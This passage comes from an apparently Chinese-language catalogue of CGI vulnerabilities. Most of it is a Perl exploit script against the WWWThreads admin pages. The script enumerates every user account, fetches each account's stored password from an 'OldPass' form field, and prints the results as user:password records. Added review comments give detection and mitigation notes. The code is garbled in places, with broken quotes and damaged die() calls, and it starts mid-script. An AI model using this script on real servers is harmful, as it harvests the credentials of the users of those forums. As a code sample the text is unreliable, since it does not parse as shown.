|
CGI漏洞(30)
# NOTE(review): this listing begins mid-script. The loop that supplies $let and the code
# that sets $ip, $username and $passhash are outside the excerpt, and the three closing
# braces after the first inner loop close blocks opened there.
# NOTE(review): several tokens look damaged by page extraction (curly quotes in place of
# straight quotes, unbalanced parentheses in the die() calls, "$=1"), so the text does
# not parse as Perl as shown. It is documented here as found, not repaired.

# Step 1: request the admin user listing. The Cookie header carries $username and
# $passhash; judging by the variable name, the second value is a password hash rather
# than the password itself (confirm against the part of the script not shown).
# Defender note: if the server accepts that value as proof of identity, the stored hash
# is password-equivalent and must be protected like a password.
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";
my @D=sendraw($tosend);
# Collect every account name that appears in a showoneuser.pl?User=... link of the reply.
foreach $line (@D){
  if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
    push @users, $1;}}}
# An array in scalar context yields its element count.
$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
  "Fetching individual passwords...\r\n";
# Step 2: one request to admin/showoneuser.pl per collected account, with the same Referer
# and Cookie headers as above.
# Detection note: in web-server logs this appears as a single client requesting
# admin/showusers.pl and then admin/showoneuser.pl?User=... once per account, each as
# HTTP/1.0 with a Referer of /cgi-bin/wwwthreads/.
foreach $user (@users){
  $parms="User=$user";
  $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
    "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
    "Cookie: Username=$username; Password=$passhash\r\n\r\n";
  my @D=sendraw($tosend);
  foreach $line (@D){
    # The script expects the admin page to pre-fill an "OldPass" form field with the
    # stored credential. Mitigation note: a page that echoes a stored credential into
    # HTML discloses it to anyone who can load that page; such a field should be empty.
    if($line=~/OldPass value = "([^"]+)"/){
      # Percent-decode (%XX -> byte) the captured value and the account name.
      ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
      $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
      # Emit one colon-delimited record per account on STDOUT, then stop scanning this
      # reply; the status messages go to STDERR, so STDOUT holds only the records.
      print $user.‘:‘.$pass."::::::::::\n";
      last;}}}
print STDERR "done.\r\n\r\n";

# sendraw($pstr): send the raw request text $pstr to the host in the global $ip over TCP
# and return the reply as a list of lines. Dies if the address lookup, socket creation or
# connect fails.
sub sendraw {
  my ($pstr)=@_;
  my $target;
  # NOTE(review): an operator (presumably "||") and a closing parenthesis appear to be
  # missing before and inside each die() call below - extraction damage, left as found.
  $target= inet_aton($ip) die("inet_aton problems";
  socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp‘)0) die("Socket problems\n";
  # Hand-packed socket address: native short 2 (presumably AF_INET), network-order port
  # 80, the 4-byte address, then 8 bytes of padding. The port is fixed at 80.
  if(connect(S,pack "SnA4x8",2,80,$target)){
    # Make the bareword handle S the default output handle so the bare print writes the
    # request to the socket. "$=1" is presumably a damaged "$|=1" (autoflush) - confirm.
    select(S);
    $=1;
    print $pstr;
    # List-context read: collects every line the server sends until end of file.
    my @in=<S>;
    # Restore STDOUT as the default output handle before returning.
    select(STDOUT);
    close(S);
    return @in;
  } else {
    die("Can‘t connect...\n";
  }}
四十三.msadcs.dll IIS 4.0的缺省安装设置的是MDAC1.5,这个安装下有一个/msadc/msadcs.dll的文件,也允许
|